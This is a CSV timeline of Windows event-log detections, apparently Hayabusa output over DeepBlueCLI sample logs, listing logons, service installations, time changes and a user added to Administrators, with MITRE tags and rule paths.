Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:16:27.000 +09:00,37L4247D28-05,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:17:29.468 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Heartbeat Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Heartbeat | Account: NT AUTHORITY\NetworkService | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:32.328 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: SynthVid | Path: system32\DRIVERS\VMBusVideoM.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:38.218 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Data Exchange Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature KvpExchange | Account: NT AUTHORITY\LocalService | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:40.125 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Guest Shutdown Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Shutdown | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:41.421 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Volume Shadow Copy Requestor | Path: %SystemRoot%\system32\vmicsvc.exe -feature VSS | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:43.125 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: netvsc | Path: system32\DRIVERS\netvsc60.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:44.875 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Time Synchronization Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature TimeSync | Account: NT AUTHORITY\LocalService | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:11.000 +09:00,37L4247D28-05,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:21:28.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x298c5 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x29908 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:29:39.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:30:56.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:32:13.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:33:15.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d5b | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d8d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:46:48.772 +09:00,IE8Win7,7045,info,,New Service Installed,Name: Windows Activation Technologies Service | Path: %SystemRoot%\system32\Wat\WatAdminSvc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:48:35.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:50:26.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f43 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f73 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:55:52.082 +09:00,IE8Win7,7045,info,,New Service Installed,Name: Microsoft .NET Framework NGEN v4.0.30319_X86 | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:03:23.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:04:53.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:05:33.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:06:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:18:24.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:19:51.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:21:52.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:23:07.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a20 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a67 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:35:55.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:36:43.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24902 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24936 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:44:06.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:45:59.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19489 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x194bb | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:54:08.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:00.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19153 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
